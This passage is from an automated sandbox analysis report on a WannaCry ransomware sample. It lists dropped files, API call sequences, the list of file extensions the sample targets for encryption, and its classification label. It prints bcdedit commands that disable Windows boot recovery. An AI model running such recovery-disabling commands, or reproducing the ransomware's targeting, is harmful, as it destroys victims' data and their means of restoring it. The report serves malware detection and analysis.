Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ko\~SD98FD.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lt\~SD98FE.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lv\~SD98FF.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nb\~SD9900.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nl\~SD9901.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pl\~SD9902.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_BR\~SD9913.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_PT\~SD9914.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ro\~SD9915.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\ru\~SD9916.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sk\~SD9917.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sl\~SD9918.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sr\~SD9919.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\sv\~SD9929.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\th\~SD992A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\tr\~SD992B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\uk\~SD992C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\vi\~SD992D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_CN\~SD992E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_TW\~SD992F.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_metadata\~SD9940.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\~SD9941.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\~SD9942.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\~SD9943.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\ar\~SD9944.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\bg\~SD9945.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\ca\~SD9955.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\cs\~SD9956.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\da\~SD9957.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\de\~SD9958.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\el\~SD9959.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\en\~SD995A.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\Users\luketaylor\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\es\~SD995B.tmp
May use bcdedit to modify the Windows boot settings
Source: tasksche.exeBinary or memory string: 4bcdedit.exe_
Command shell drops VBS files
Source: C:\Windows\System32\cmd.exeFile created: C:\ProgramData\ywepvofkuzu108\m.vbs
Creates files in the system32 config directory
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exeFile created: C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\mssecsvc.exeExecutable created and started: C:\WINDOWS\tasksche.exe
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile created: C:\ProgramData\ywepvofkuzu108\u.wnry
Uses bcdedit to modify the Windows boot settings
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: unknownProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,5_2_100011D0
Generates new code (likely due to unpacking of malware or shellcode)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode execution: Found new code
PE file contains an invalid checksum
Source: tasksche.exe.3048.drStatic PE information: real checksum: 0x0 should be: 0x363012
Source: mssecsvc.exeStatic PE information: real checksum: 0x0 should be: 0x394136
Source: tasksche.exe.3216.drStatic PE information: real checksum: 0x0 should be: 0x363012
PE file contains sections with non-standard names
Source: libeay32.dll.3408.drStatic PE information: section name: /4
Source: libeay32.dll.3408.drStatic PE information: section name: /19
Source: libeay32.dll.3408.drStatic PE information: section name: /31
Source: libeay32.dll.3408.drStatic PE information: section name: /45
Source: libeay32.dll.3408.drStatic PE information: section name: /57
Source: libeay32.dll.3408.drStatic PE information: section name: /70
Source: libeay32.dll.3408.drStatic PE information: section name: /81
Source: libeay32.dll.3408.drStatic PE information: section name: /92
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /4
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /19
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /31
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /45
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /57
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /70
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /81
Source: libevent-2-0-5.dll.3408.drStatic PE information: section name: /92
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /4
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /19
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /31
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /45
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /57
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /70
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /81
Source: libevent_core-2-0-5.dll.3408.drStatic PE information: section name: /92

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_10002300
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,5_2_10004A40
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exeCode function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,14_2_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,14_2_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 14_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,14_2_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,18_1_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,swprintf,#825,#825,18_1_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeCode function: 18_1_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,18_1_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exeCode function: 23_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,23_1_00401080
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\wbengine.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Enumerates the file system
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\~SD874C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\~SD874B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\~SD8739.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD874E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\~SD874D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeFile opened: C:\Users\All Users\Adobe\~SD874A.tmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeDirectory queried: number of queries: 1017

System Summary:

Executable creates window controls seldom found in malware
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeWindow found: window name: RICHEDIT
Uses Rich Edit Controls
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exeFile opened: C:\Windows\system32\RICHED32.DLL
Submission file is bigger than most known malware samples
Source: mssecsvc.exeStatic file information: File size 3723264 > 1048576
PE file has a big raw section
Source: mssecsvc.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x35b000
Binary contains paths to development resources
Source: tasksche.exe, mssecsvc.exeBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
Source: tasksche.exeBinary or memory string: .der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.edb.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.dotx.dotm.dot.docm.docb.jpg.jpeg.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.eml.msg.ost.pst.pptx.ppt.xlsx.xls.docx.doc%s\%d%s.WNCRYT%s%sTWANACRY!.WNCRY.WNCYR\\@WanaDecryptor@.bmp@WanaDecryptor@.exe.lnk@Please_Read_Me@.txt%s\%s...%s\*.dll.exe~SD@WanaDecryptor@.exeContent.IE5Temporary Internet Files This folder protects against ransomware. Modifying it will reduce protection\Local Settings\Temp\Ap
Source: @WanaDecryptor@.exeBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
Classification label
Source: classification engineClassification label: mal100.evad.rans.phis.spyw.troj.winEXE@57/432@2/8
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 21_2_00401398 Sleep,AdjustTokenPrivileges,21_2_00401398
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 38_1_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,38_1_00401000
Source: C:\ProgramData\ywepvofkuzu108\taskse.exeCode function: 38_1_00401398 Sleep,AdjustTokenPrivileges,38_1_00401398
Contains functionality to check free disk space
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exeCode function: 5_2_10005540 GetDriveTypeW,InterlockedExchangeAdd,GetDiskFreeSpaceExW,Sleep,GetDiskFreeSpaceExW,Sleep,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,InterlockedExchange,GetDriveTypeW,5_2_10005540
Contains functionality to create services
Source: C:\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00407C40
Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,3_2_00401CE8
Contains functionality to load and extract PE file embedded resources
